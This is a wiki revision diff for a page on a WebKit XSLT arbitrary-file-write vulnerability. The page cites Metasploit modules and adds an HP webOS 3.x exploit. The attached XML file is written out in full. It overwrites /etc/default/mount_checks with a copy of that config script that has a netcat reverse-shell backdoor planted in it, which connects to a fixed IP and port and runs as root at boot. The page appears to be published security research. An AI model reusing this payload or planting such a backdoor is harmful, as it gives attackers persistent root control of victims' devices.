Changes for page Application_Webkit


on 2012/01/13 23:57


on 2012/01/14 00:08
Summary
Details
- Page properties
-
- Content
-
... ... @@ -28,7 +28,7 @@ 28 28 29 29 PoC included on the [[libxslt>>Engine_libxslt]] page demonstrate the vulnerability. 30 30 31 -== Exploits==31 +== Meatsploit == 32 32 33 33 Two modules are included in Metasploit : 34 34 ... ... @@ -35,7 +35,9 @@ 35 35 * a [[auxiliary>>http://www.metasploit.com/modules/auxiliary/server/webkit_xslt_dropper||rel="__blank"]] working on any non-sandboxed non-patched Webkit device 36 36 * an [[exploit>>http://www.metasploit.com/modules/exploit/windows/browser/safari_xslt_output||rel="__blank"]] plugin targeting Safari users with Admin privileges (because of the MOF trick) 37 37 38 - Anexploit forHP webOSis attached.This exploitdrops a backdoor executed with root privileges at boot time :38 +== HP webOS 3.x == 39 39 40 -* XML contains the payload : destination file name + file content. A reverse-shell based on netcat is added to the script 41 -* XSL reads the XML file and create the requested file on disk 40 +An exploit for HP webOS 3.x was developed. This exploit drops a backdoor which is later executed with root privileges at boot time. The exploit is composed of two files : 41 + 42 +* [[webos-root-backdoor.xml>>attach:webos-root-backdoor.xml]] contains the configurable data (name and content of the destination file) and a processing instruction trigger the XSLT code 43 +* [[webos-root-backdoor.xsl>>attach:webos-root-backdoor.xsl]] reads the XML file and create the requested file on disk. This version overwrites a script located in /etc/default/ with a version including a reverse-shell based on netcat
- webos-root-backdoor.xml
-
- Author
-
... ... @@ -1,0 +1,1 @@ 1 +xwiki:XWiki.NicolasGregoire - Size
-
... ... @@ -1,0 +1,1 @@ 1 +1.7 KB - Content
-
... ... @@ -1,0 +1,54 @@ 1 +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> 2 +<?xml-stylesheet type="text/xsl" href="xslt2root.xsl"?> 3 +<exploit><location>/etc/default/mount_checks</location><content><![CDATA[# -*- mode: conf; -*- 4 + 5 +# Backdoor, by Nicolas Gregoire / Agarri 6 +IP="192.168.2.89" 7 +PORT="4444" 8 + 9 +MKNOD="/bin/mknod" 10 +NC="/usr/bin/nc" 11 +FIFO="/tmp/.a" 12 + 13 +( $MKNOD $FIFO p; while true; do { sleep 1; $NC $IP $PORT < $FIFO | /bin/sh &> $FIFO ; } done ; rm $FIFO ) & 14 +# End backdoor 15 + 16 + 17 +# Set this to save a file across reboots to indictate on boot that 18 +# umount happened correctly (and that, e.g. battery wasn't pulled) 19 +MOUNT_STAMP=/var/umount.stamp 20 +# tags used in MOUNT_STAMP 21 +REASON_MARK=reason 22 +CLEAN_UMOUNT_MARK=date 23 + 24 +# name of system property holding true/false based on presence of 25 +# $MOUNT_STAMP. Ignored if MOUNT_STAMP not set; must be defined 26 +# otherwise 27 +MOUNT_PROPERTY=last_umount_clean 28 + 29 +# file that contains 1 if / should be remounted rw, 0 otherwise 30 +REMOUNT_TOKEN="/etc/.rootfs_RW" 31 + 32 +# If an fsck or reformat of /media/internal was required on boot, set 33 +# this property. 34 +MEDIA_FIX_PROPERTY=media_fixed_how 35 + 36 +WIPE_FLAGS_DIR=/var/.flags 37 +WIPE_FLAGS_FILE=$WIPE_FLAGS_DIR/on_mount 38 +WIPE_PROGRESS=/var/.sought_blocks 39 + 40 +# MMC_PROTECT_OPTS=-f 41 +MMC_PROTECT_OPTS="" 42 +MMC_PROTECT_DISABLED=1 43 +mmc_boot_update() { 44 + if which mmc_protect >/dev/null && test -z "$MMC_PROTECT_DISABLED" ; then 45 + BOOT_DEV=$(sed 's,.*root=\(/dev/[^ ]*\) .*,\1,' < /proc/cmdline) 46 + ON_OFF=1 # on by default 47 + if [ -f "$REMOUNT_TOKEN" -a "$(cat $REMOUNT_TOKEN)" = "1" ]; then 48 + ON_OFF=0 49 + fi 50 + mmc_protect $MMC_PROTECT_OPTS -D "$BOOT_DEV" -p $ON_OFF 51 + fi 52 +} 53 +]]></content></exploit> 54 +